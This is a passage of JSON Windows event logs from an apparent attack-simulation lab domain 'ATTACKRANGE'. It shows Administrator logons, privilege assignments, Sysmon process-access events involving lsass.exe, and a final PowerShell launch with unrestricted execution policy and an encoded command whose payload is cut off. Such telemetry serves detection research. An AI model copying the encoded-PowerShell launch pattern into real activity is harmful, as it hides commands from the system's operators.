command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220632,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x885AD\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x885ad","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220633,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x885AD\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x885ad","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.385\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.385","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.385\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.385","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.401\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.401","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001071840800}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.401\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nProcessId: 5060\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rrk5ehms.nqo.ps1\r\nCreationUtcTime: 2020-08-01 06:55:20.401","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.401","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-001071840800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rrk5ehms.nqo.ps1","CreationUtcTime":"2020-08-01 06:55:20.401","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.448\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.448","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001071840800}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.448\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.448","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001071840800}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.500\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nProcessId: 4660\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 